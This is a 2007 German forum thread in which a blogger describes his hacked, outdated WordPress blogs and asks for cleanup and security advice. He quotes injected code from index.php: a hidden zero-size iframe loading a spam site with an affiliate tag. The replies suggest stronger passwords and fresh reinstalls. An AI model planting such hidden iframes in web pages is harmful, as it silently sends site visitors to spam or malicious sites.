Schadensbegrenzung nach Trojaner-Angriff?

  • Hallo,

    zwei Wordpress-Blogs von mir habe ich nachlässig behandelt und seit Version 2.05 nicht aktualisiert. Das hat sich nun gerächt: Heute morgen um 4:26 Uhr hat irgendwas oder irgendwer einen Haufen Dateien überschrieben. Nach außen laufen beide Blogs (hansels.de - Ein Blog, Polen-Netzwerk) noch richtig, aber wenn ich mich in den Admin-Bereich einloggen möchte, wird eine Seite namens "free20.com" aufgerufen und ich erhalte böse Spamdinge auf meinem Bildschirm.

    Ich bin zugegeben nicht so in den Hintergründen vertraut und habe zur ersten Schadensbegrenzung erst einmal eine ältere gesicherte Version wieder aufgespielt. Nun funktioniert alles wieder, ich habe aber Angst, dass das entweder wieder passiert oder dass sogar jemand nun dauerhaft auf meine Passworte und Inhalte zugreifen kann. Was muss ich tun, damit das nicht passieren kann?

    Einschub, nachgetragen: Das habe ich im Code der index.php gefunden, ich frage mich nur, wie man die manipulieren konnte:

    Zitat

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

    Ich mache nun ein Update auf die aktuelle Version 2.2. Und werde das auch zukünftig weiter machen. Auch ändere ich die Passworte. Aber: Ich habe Sorge, dass noch Plugins infiziert sein könnten. Ich nutze in den Blogs:

    Akismet, CJD Spam, Follow URL, Hello Dolly, o42cleanUmlauts, TimeZone, UpdateMonitor, Database-Backup, WP-Contactform, Shortstat

    Weiterhin war ein AdSense-Tool installiert, das aber meiner ersten Einschätzung folgend für das Desaster verantwortlich war. Deswegen habe ich es entfernt. Danach stellte ich aber fest, dass offensichtlich ShortStat auch irgendwie infiziert war; bevor ich eine Datei namens Shortstat nicht löschte, erschien beim Login im Admin-Bereich immer noch die ominöse free20.com-Spamsite.

    Habe ich vielleicht irgendwo zu viele Rechte vergeben? Ich würde mich über Sicherheitstipps sehr freuen. Das geniale Wordpress habe ich bisher immer nur als ideales Instrument für einfaches Veröffentlichen gesehen und das Sicherheitsthema einfach zu sehr vernachlässigt. Nach allem, was ich hier im Forum nun dazu las, bin ich doch sehr beunruhigt; scheinbar ist es bei mir zu lange gut gegangen.

    Kann mir jemand Absicherungstipps für die Schreibrechte geben? Soll ich noch Plugins löschen? Kann ich doch beruhigter sein, als ich im Moment bin? Schon einmal vielen Dank!

    Herzliche Grüße
    Jens:confused:

    Einmal editiert, zuletzt von hansels (20. Mai 2007 um 15:53)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ergänzung: Wie die Trojaner-Reste beseitigen?

    Hallo noch einmal,

    trotz Updates auf die aktuelle Version wird an irgendwelchen Stellen immer noch die free20.com (Spam-Site) geladen. Man sieht davon nur etwas in der Adresszeile unten im Firefox. Gibt es einen Weg - außer der kompletten Deinstallation - diese Reste zu entfernen? Hat damit schon jemand Erfahrung?

    Muss ich jeder einzelne Datei untersuchen? Oder gibt es einen besseren Weg? Und vor allem: Wie vermeide ich so etwas in Zukunft? Über Hilfe wäre ich sehr dankbar!

    Beste Grüße
    Jens:confused:

  • Hast Du dein FTP-Passwort mal komplexer gewählt. Evtl. ist es zu simpel oder lässt sich mittels Brute-Force schnell knacken, sodass der Übeltäter Zugriff auf deinen Server hat?

    Evtl. hat sich was in der Datenbank eingenistet, sodass es trotz Update noch da ist.

  • Scheint ernsthaft zu sein...

    Hallo TobbisBlog,

    Danke für die Antwort. Ich glaube nicht, dass es am FTP-Passwort liegt, da auf dem Server noch einiges mehr liegt, was für Spammer wohl interessanter wäre. Glaube ich eher nicht. Ich habe nun mal alle Dateien einzeln analysiert, und die html-a-href ist überall einfach druntergeschrieben. Scheint ein Automatismus zu sein, der irgendwie übers Template oder ein Plugin hineingekommen ist.

    Bei einem Blog habe ich nun alles bis auf die Datenbank neu installiert und das Theme nachgebaut. Scheint bisher zu klappen und spamfrei zu sein. Ist aber ein Riesenaufwand. Ich fürchte, ich komme auch beim zweiten Blog nicht darum herum...

    Was genau ist Brute-Force?

    Und: Ich hoffe, dass nichts in der DB ist. Das werde ich ja bald wissen, wenn es wieder kommt, muss ich wohl davon ausgehen.

    Kann man noch irgendwas schützend unternehmen?

    Viele Grüße
    Jens

  • Wichtig: Wenn du jetzt dein Blog aufspielst, solltest du "frische" Versionen nehmen. Sowohl in Sachen Plugins, Themes und WordPress an sich. Also möglichst nichts, was schon auf dem gehackten Server drauf war.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Danke...

    Hallo Tobbis und Jottlieb,

    Danke. Nun weiß ich auch mehr über Brute-Force. Auf Wikipedia oder Google hätte ich dabei auch selbst kommen können; sorry: Hatte eine Software dahinter vermutet.

    Die erste Installation habe ich neu fertig; scheint sauber. Nun kommt die zweite. Zum Glück hatte ich die Datenbanken gesichert...

    Kurze Frage am Rande: Habe "by the way" auf aussagefähige Permalinks umgeschaltet. Nun funktionieren meine Kommentare nicht mehr, Fehler 404. Hat jemand Rat?

    Vielen Dank und viele Grüße
    Jens

    Einmal editiert, zuletzt von hansels (21. Mai 2007 um 21:32)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!